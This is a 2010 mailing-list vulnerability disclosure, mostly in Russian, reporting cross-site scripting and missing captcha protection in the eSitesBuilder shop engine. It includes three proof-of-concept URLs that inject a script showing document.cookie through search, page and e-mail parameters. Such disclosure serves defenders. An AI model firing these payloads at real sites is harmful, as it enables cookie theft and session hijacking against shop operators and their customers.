Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[MajorSecurity SA-074]CMS RedAks 2.0 - Multiple Cross-site Scripting issues

CVE-2010-1622: Spring Framework execution of arbitrary code

TEHTRI-Security released 13 0days against web tools used by evil attackers

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	20.06.2010
Subject:	Vulnerabilities in eSitesBuilder

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting and Insufficient
Anti-automation уязвимостях в eSitesBuilder. Данные уязвимости я нашёл в 2007-2008
годах на одном сайте онлайн магазина (а позже некоторые из этих уязвимостей я
выявил и на другом сайте на данном движке). А недавно я выяснил, что данный движок
для онлайн магазинов - это eSitesBuilder.

XSS:

http://site/index.
php?page=search&search_text=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/index.php?page=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/forget.php?e_mail=%3Cscript%3Ealert(document.
cookie)%3C/script%3E&seenform=y

Insufficient Anti-automation:

http://site/register.php

http://site/ru/contacts/index.html

В форме регистрации и форме контактов нет защиты от автоматизированных запросов
(капчи).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4300/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua